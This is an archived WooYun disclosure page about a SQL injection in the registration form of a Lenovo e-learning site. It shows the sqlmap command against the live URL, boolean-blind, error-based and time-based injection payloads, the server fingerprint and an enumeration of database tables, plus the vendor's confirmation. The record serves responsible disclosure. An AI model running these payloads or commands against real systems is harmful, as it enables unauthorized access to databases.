当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037053

漏洞标题:联想某分站sql注入漏洞一枚

相关厂商:联想

漏洞作者: noah

提交时间:2013-09-16 17:44

修复时间:2013-10-31 17:45

公开时间:2013-10-31 17:45

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-16: 细节已通知厂商并且等待厂商处理中
2013-09-17: 厂商已经确认,细节仅向厂商公开
2013-09-27: 细节向核心白帽子及相关领域专家公开
2013-10-07: 细节向普通白帽子公开
2013-10-17: 细节向实习白帽子公开
2013-10-31: 细节向公众公开

简要描述:

SQL注入漏洞

详细说明:

1、这个站前面的人2012年提交过了一次
WooYun: 联想中国某分站SQL注入高危漏洞
之前是登陆框处注入,这次是注册及找回密码处
2、注入点:e-learning.lenovo.com.cn/user/registration
C:\Python27\sqlmap>sqlmap.py -u http://e-learning.lenovo.com.cn/user/registratio
n --data RegistrationForm[group_id]=
POST parameter 'RegistrationForm[group_id]' is vulnerable. Do you want to keep t
esting the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 280 HTTP(s) req
uests:
---
Place: POST
Parameter: RegistrationForm[group_id]
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace (original value)
Payload: RegistrationForm[group_id]=(SELECT (CASE WHEN (3189=3189) THEN '' E
LSE 3189*(SELECT 3189 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
Payload: RegistrationForm[group_id]=-7111 OR (SELECT 3857 FROM(SELECT COUNT(
*),CONCAT(0x717a656171,(SELECT (CASE WHEN (3857=3857) THEN 1 ELSE 0 END)),0x7169
686271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: RegistrationForm[group_id]=-3594 OR 4291=SLEEP(5)
---
[20:26:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.0, PHP 5.2.14
back-end DBMS: MySQL 5.0
[20:26:08] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 17 times, 500 (Internal Server Error) - 265 times
[20:26:08] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\e-learning.lenovo.com.cn'
[*] shutting down at 20:26:08
3、数据库信息:
[20:29:09] [INFO] the SQL query used returns 2 entries
[20:29:10] [INFO] retrieved: information_schema
[20:29:10] [INFO] retrieved: lenovo
available databases [2]:
[*] information_schema
[*] lenovo
4、表信息太多了,不跑了
Database: lenovo
[197 tables]
+---------------------------------------+
| active |
| active_type |
| active_up |
| active_up_user |
| active_user |
| ad_manage |
| admin_log |
| admin_users |
| am_news |
| area |
| area_cost |
| area_credits |
| area_main |
| area_photo |
| area_suggest |
| area_teacher |
| ask |
| ask_answer |
| ask_comment |
| ask_good |
| ask_login_detail |
| ask_score_detail |
| ask_search_keyword |
| ask_too |
| ask_user_reply_detail |
| assessquarter |
| autumnsurvey11 |
| autumnsurvey12 |
| bao_click_record |
| bao_click_record_20110829 |
| bao_click_record_201112 |
| bao_click_record_20120117 |
| bao_history |
| bao_map |
| bao_q_record |
| bao_q_record_20110829 |
| bao_q_record_20120109 |
| bao_q_record_20120117 |
| bao_record |
| bao_record_20110829 |
| bao_record_20120109 |
| bao_record_20120117 |
| bao_session |
| bbs_elearning_groups |
| bind_record |
| cdb_access |
| cdb_activities |
| cdb_activityapplies |
| cdb_addons |
| cdb_adminactions |
| cdb_admincustom |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_adminsessions |
| cdb_advertisements |
| cdb_announcements |
| cdb_assessment |
| cdb_assessment_2011q1 |
| cdb_attachmentfields |
| cdb_attachments |
| cdb_attachpaymentlog |
| cdb_attachtypes |
| cdb_banned |
| cdb_bbcodes |
| cdb_caches |
| cdb_creditslog |
| cdb_crons |
| cdb_debateposts |
| cdb_debates |
| cdb_failedlogins |
| cdb_faqs |
| cdb_favoriteforums |
| cdb_favorites |
| cdb_favoritethreads |
| cdb_feeds |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forumrecommend |
| cdb_forums |
| cdb_imagetypes |
| cdb_invites |
| cdb_itempool |
| cdb_magiclog |
| cdb_magicmarket |
| cdb_magics |
| cdb_medallog |
| cdb_medals |
| cdb_memberfields |
| cdb_membermagics |
| cdb_memberrecommend |
| cdb_members |
| cdb_memberspaces |
| cdb_moderators |
| cdb_modworks |
| cdb_mytasks |
| cdb_navs |
| cdb_onlinelist |
| cdb_onlinetime |
| cdb_orders |
| cdb_paymentlog |
| cdb_pluginhooks |
| cdb_plugins |
| cdb_pluginvars |
| cdb_polloptions |
| cdb_polls |
| cdb_postposition |
| cdb_posts |
| cdb_profilefields |
| cdb_projects |
| cdb_promotions |
| cdb_prompt |
| cdb_promptmsgs |
| cdb_prompttype |
| cdb_ranks |
| cdb_ratelog |
| cdb_regips |
| cdb_relatedthreads |
| cdb_reportlog |
| cdb_request |
| cdb_rewardlog |
| cdb_rsscaches |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_spacecaches |
| cdb_stats |
| cdb_statvars |
| cdb_styles |
| cdb_stylevars |
| cdb_tags |
| cdb_tasks |
| cdb_taskvars |
| cdb_templates |
| cdb_threads |
| cdb_threadsmod |
| cdb_threadtags |
| cdb_threadtypes |
| cdb_tradecomments |
| cdb_tradelog |
| cdb_tradeoptionvars |
| cdb_trades |
| cdb_typemodels |
| cdb_typeoptions |
| cdb_typeoptionvars |
| cdb_typevars |
| cdb_uc_admins |
| cdb_uc_applications |
| cdb_uc_badwords |
| cdb_uc_domains |
| cdb_uc_failedlogins |
| cdb_uc_feeds |
| cdb_uc_friends |
| cdb_uc_mailqueue |
| cdb_uc_memberfields |
| cdb_uc_members |
| cdb_uc_mergemembers |
| cdb_uc_newpm |
| cdb_uc_notelist |
| cdb_uc_pms |
| cdb_uc_protectedmembers |
| cdb_uc_settings |
| cdb_uc_sqlcache |
| cdb_uc_tags |
| cdb_uc_vars |
| cdb_usergroups |
| cdb_validating |
| cdb_warnings |
| cdb_words |
| cmamonthshop |
| contest |
| control |
| control_type |
| course |
| course_record |
| course_record_log |
| course_type |
| courseware |
| courseware_comment |
| courseware_detail |
| courseware_survey |
| datum |
| datum_sort |
| dealer |
| dict_card_lc |
| dict_card_lc_lstemp |
| dict_card_lz |
| dict_card_lz_lstemp |
| dict_card_user |
| dict_card_user_lstemp |
| dict_card_zd |
| dict_card_zd_lstemp |
| dict_shop |
| dict_shop_lstemp |
| dict_sys_user |
| dict_sys_user_lstemp |
| downfile |
+---------------------------------------+
Database: information_schema
[16 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+

漏洞证明:

QQ截图20130913204823.png


修复方案:

版权声明:转载请注明来源 noah@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-09-17 17:51

厂商回复:

感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞

最新状态:

暂无


漏洞评价:

评论